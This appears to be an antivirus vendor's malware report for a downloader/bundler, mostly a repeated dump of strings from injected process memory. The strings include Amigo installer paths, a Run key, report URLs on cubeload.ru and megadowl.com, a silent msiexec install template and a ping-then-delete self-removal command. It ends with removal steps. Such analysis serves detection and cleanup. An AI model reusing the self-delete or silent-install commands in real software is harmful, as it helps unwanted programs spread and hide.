6(606\6`6

7333331

33333333

3333331

7331331

3333333

combase.dll

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

%systemroot%\system32\msiexec.exe

"%s" /i "%s" /quiet %s

"%s" ,%s %s

B%s\%s

/Cookie: %s

.runas

%d.%d.%d.%d

diexplore.exe

firefox.exe

chrome.exe

Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE

@Advapi32.dll

{8856F961-340A-11D0-A96B-00C04FD705A2}

INJ6F2.tmp_2556_rwx_00D52000_00001000:

<requestedExecutionLevel level='asInvoker' uiAccess='false' />

name='Microsoft.Windows.Common-Controls' version='6.0.0.0'

processorArchitecture='*' publicKeyToken='6595b64144ccf1df' language='*' />

INJ2AF6.tmp_3644:

.text

`.rdata

@.data

.rsrc

@.reloc

D$@j.Xf

FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8

PSSSSSSh

u$SShe

t.SSj

PSSh\

j.Yf;

_tcPVj@

.PjRW

Dw.AEw

Cv.SCv

Av.TBvf

Kernel32.dll

CCmdTarget

Comdlg32.dll

Comctl32.dll

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

CNotSupportedException

TaskDialogIndirect

RegDeleteKeyExW

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

\*/:<>?|"

ec2-35-176-87-12.eu-west-2.compute.amazonaws.com

386973894

()$^.* ?[]|\-{},:=!

AmigoDistrib.exe

%LOCALAPPDATA%\Amigo\Application\amigo.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

URL =

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo

aswhookx.dll

Line %d, Column %d

Bad URL.

Cannot get file size, bad URL.

Request cannot be completed on current url.

Unable to get HTTP status:

ReportStart request failed. Bad data received: "

ReportFinish request failed. Bad data received: "

ReportComponent request failed. Bad data received: "

ReportDefaultComponent failed. Bad data received: "

ReportClose request failed. Bad data received: "

HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

HKEY_CLASSES_ROOT\http\shell\open\command

opera

HttpSendRequestW

HttpQueryInfoW

HttpOpenRequestW

InternetCanonicalizeUrlW

WININET.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

EnumWindows

GetKeyState

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

USER32.dll

GetViewportExtEx

SetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

ScaleViewportExtEx

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

RegCreateKeyExW

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

RegDeleteKeyW

RegEnumKeyW

ADVAPI32.dll

ShellExecuteW

ShellExecuteExW

SHELL32.dll

COMCTL32.dll

SHLWAPI.dll

ole32.dll

OLEAUT32.dll

oledlg.dll

GdiplusShutdown

gdiplus.dll

OLEACC.dll

zcÁ

.?AVCCmdUI@@

.PAVCException@@

.PAVCUserException@@

.?AVCTestCmdUI@@

.PAVCMemoryException@@

.PAVCOleException@@

.PAVCOleDispatchException@@

.PAVCObject@@

.PAVCResourceException@@

.PAVCSimpleException@@

.?AVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.PAVCFileException@@

.?AVCCmdTarget@@

.?AVHttpDownloaderException@@

.?AVHttpDownloader@@

).airo

\}t%x

r .hedg

ua.qc0

zb%dGbL

-g}B*p

%_'w

.US`:f

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

"All files (*.*)" = "

(*.*)"

"All files (*.*)" = "All files (*.*)"

3M4

6|7V8

9"9&9*919

2#21292?2

8#8)848[8

4 4$4(4,40444~4

4_5l5x5

4 4&404;4~4

1 1$1(1,10141

4 4$4(4,4044484<4@4

=,=8=\=|=

HKernel32.dll

HComdlg32.dll

Ikernel32.dll

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

accKeyboardShortcut

commctrl_DragListMsg

Afx:%p:%x

Afx:%p:%x:%p:%p:%p

user32.dll

hhctrl.ocx

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

lX-X-x-XX-XXXXXX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

comctl32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

Dmfcm120u.dll

dshell32.dll

ED2D1.dll

DWrite.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

lXXxXXXXXXXX

combase.dll

Fmscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

portuguese-brazilian

cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"

cmd.exe /C timeout 3 > Nul & Del "%s"

hXXp://megadowl.com/terms-ru.html

All files (*.*)

r.ico

. Component url:

chrome

firefox

s.lnk

\amigo.exe

application/exe

application/x-dosexec

WINDOWS

\\.\PhysicalDrive%d

Advapi32.dll

x-x-x-x-x-x

oIphlpapi.dll

hXXp://

explorer.exe

_Label_Url_

Wininet.dll

ntdll.dll

C:\Windows\TEMP\INJ2AF6.tmp

Citizen_Cope.mp3

1340951093

C:\Download

5.5.4

cubeload.ru

request/report?

&key=

User-Agent: /Content-Type: application/x-www-form-urlencoded

\\.\PhysicalDrive

ÞSKTOP%

%DOWNLAODS%

windows

downloads!hXXp://megadowl.com/terms-ru.html

HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName

file_url

file_url_domain

send_report_type

reg_key

ReportStart failed

ReportClose failed

ReportFinish failed

ReportComponent failed

by url:

Failed executing file:

report_delay

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version

. File URL:

HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents

%s [Recovered]

INJ2AF6.tmp_3644_rwx_00400000_0011E000:

.text

`.rdata

@.data

.rsrc

@.reloc

D$@j.Xf

FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8

PSSSSSSh

u$SShe

t.SSj

PSSh\

j.Yf;

_tcPVj@

.PjRW

Dw.AEw

Cv.SCv

Av.TBvf

Kernel32.dll

CCmdTarget

Comdlg32.dll

Comctl32.dll

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

CNotSupportedException

TaskDialogIndirect

RegDeleteKeyExW

GetProcessWindowStation

operator

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

\*/:<>?|"

ec2-35-176-87-12.eu-west-2.compute.amazonaws.com

386973894

()$^.* ?[]|\-{},:=!

AmigoDistrib.exe

%LOCALAPPDATA%\Amigo\Application\amigo.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

URL =

HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo

aswhookx.dll

Line %d, Column %d

Bad URL.

Cannot get file size, bad URL.

Request cannot be completed on current url.

Unable to get HTTP status:

ReportStart request failed. Bad data received: "

ReportFinish request failed. Bad data received: "

ReportComponent request failed. Bad data received: "

ReportDefaultComponent failed. Bad data received: "

ReportClose request failed. Bad data received: "

HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice

HKEY_CLASSES_ROOT\http\shell\open\command

opera

HttpSendRequestW

HttpQueryInfoW

HttpOpenRequestW

InternetCanonicalizeUrlW

WININET.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

EnumWindows

GetKeyState

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

USER32.dll

GetViewportExtEx

SetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

ScaleViewportExtEx

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

RegCreateKeyExW

RegQueryInfoKeyW

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

RegDeleteKeyW

RegEnumKeyW

ADVAPI32.dll

ShellExecuteW

ShellExecuteExW

SHELL32.dll

COMCTL32.dll

SHLWAPI.dll

ole32.dll

OLEAUT32.dll

oledlg.dll

GdiplusShutdown

gdiplus.dll

OLEACC.dll

zcÁ

.?AVCCmdUI@@

.PAVCException@@

.PAVCUserException@@

.?AVCTestCmdUI@@

.PAVCMemoryException@@

.PAVCOleException@@

.PAVCOleDispatchException@@

.PAVCObject@@

.PAVCResourceException@@

.PAVCSimpleException@@

.?AVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.PAVCFileException@@

.?AVCCmdTarget@@

.?AVHttpDownloaderException@@

.?AVHttpDownloader@@

).airo

\}t%x

r .hedg

ua.qc0

zb%dGbL

-g}B*p

%_'w

.US`:f

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

"All files (*.*)" = "

(*.*)"

"All files (*.*)" = "All files (*.*)"

3M4

6|7V8

9"9&9*919

2#21292?2

8#8)848[8

4 4$4(4,40444~4

4_5l5x5

4 4&404;4~4

1 1$1(1,10141

4 4$4(4,4044484<4@4

=,=8=\=|=

HKernel32.dll

HComdlg32.dll

Ikernel32.dll

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

accKeyboardShortcut

commctrl_DragListMsg

Afx:%p:%x

Afx:%p:%x:%p:%p:%p

user32.dll

hhctrl.ocx

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp

Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

lX-X-x-XX-XXXXXX

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

comctl32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

Dmfcm120u.dll

dshell32.dll

ED2D1.dll

DWrite.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

lXXxXXXXXXXX

combase.dll

Fmscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

portuguese-brazilian

cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"

cmd.exe /C timeout 3 > Nul & Del "%s"

hXXp://megadowl.com/terms-ru.html

All files (*.*)

r.ico

. Component url:

chrome

firefox

s.lnk

\amigo.exe

application/exe

application/x-dosexec

WINDOWS

\\.\PhysicalDrive%d

Advapi32.dll

x-x-x-x-x-x

oIphlpapi.dll

hXXp://

explorer.exe

_Label_Url_

Wininet.dll

ntdll.dll

C:\Windows\TEMP\INJ2AF6.tmp

Citizen_Cope.mp3

1340951093

C:\Download

5.5.4

cubeload.ru

request/report?

&key=

User-Agent: /Content-Type: application/x-www-form-urlencoded

\\.\PhysicalDrive

ÞSKTOP%

%DOWNLAODS%

windows

downloads!hXXp://megadowl.com/terms-ru.html

HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName

file_url

file_url_domain

send_report_type

reg_key

ReportStart failed

ReportClose failed

ReportFinish failed

ReportComponent failed

by url:

Failed executing file:

report_delay

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version

. File URL:

HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion

All Files (*.*)

No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.

Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.

Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.

#Unable to load mail system support.

Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents

%s [Recovered]

Explorer.EXE_2024_rwx_01EE0000_00001000:

C:\Windows\TEMP\INJ6F2.tmp

Explorer.EXE_2024_rwx_02D60000_00001000:

C:\Windows\TEMP\INJ2AF6.tmp

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Scan a system with an anti-rootkit tool.
   
2. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   %original file name%.exe:1760
   VRT26C2.tmp:1828
   VRT28F.tmp:1856
   

3. Delete the original Virus file.
   
4. Delete or disinfect the following files created/modified by the Virus:
   

   C:\Windows\Temp\INJ2AF6.tmp (1 bytes)
   C:\Windows\Temp\INJ6F2.tmp (919 bytes)

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.